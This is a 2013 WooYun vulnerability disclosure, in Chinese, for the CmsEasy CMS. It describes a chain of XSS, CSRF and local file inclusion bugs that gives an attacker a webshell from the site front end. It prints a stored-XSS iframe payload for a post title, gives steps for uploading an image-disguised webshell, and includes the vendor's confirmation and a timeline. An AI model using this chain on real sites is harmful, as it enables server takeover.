漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044076
漏洞标题:CmsEasy 利用xss等漏洞GetShell
相关厂商:cmseasy
漏洞作者: xfkxfk
提交时间:2013-11-26 15:39
修复时间:2014-02-24 15:39
公开时间:2014-02-24 15:39
漏洞类型:文件包含
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向第三方安全合作伙伴开放
2014-01-20: 细节向核心白帽子及相关领域专家公开
2014-01-30: 细节向普通白帽子公开
2014-02-09: 细节向实习白帽子公开
2014-02-24: 细节向公众公开
简要描述:
利用XSS+CSRF+LFI即可从前台直接拿到webshell
详细说明:
第一步,注册会员,然后进入论坛发帖,在帖子中插入一句话图片格式木马。
图片内容如下:
然后右键插件元素,找到上传后图片马的地址,这里图片马的地址是
upload/images/201311/138330127188.jpg。
第二步,利用后台自定义——添加表单(或者后台模板——添加栏目标签、后台模板——添加内容标签、后台内容——添加内容——属性设置)处的本地文件包含,而且这里的本地文件包含都存在存在CSRF,所以构造好CSRF请求页面。
把此页面放到另外一个站点空间下,如url链接:
http://localhost/cmseasy-csrf.html
第三步,然后在第一步的帖子标题中插入xss,xss code内容如下:
“><iframe src= http://localhost/cmseasy-csrf.html >//src后面的url一定不能加”
写好帖子,保存,发布此帖子即可。
第四步,当管理员进行帖子管理时,就会触发帖子标题处的xss,发送请求,添加表单,得到webshll。如下如管理员进行帖子管理时,成功添加了表单。
得到的webshell的地址为:
http://localhost/cmseasy/index.php?case=form&act=add&form=my_88888888,form的值就是你csrf请求页面里卖弄的name的值,即表单名。
菜刀成功连接,得到webshell。
当然利用上面的四种漏洞,还能综合利用,多种方法都能拿到webshell
漏洞证明:
见详细说明
修复方案:
修复xss,csrf,lfi
版权声明:转载请注明来源 xfkxfk@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-26 20:04
厂商回复:
感谢
最新状态:
暂无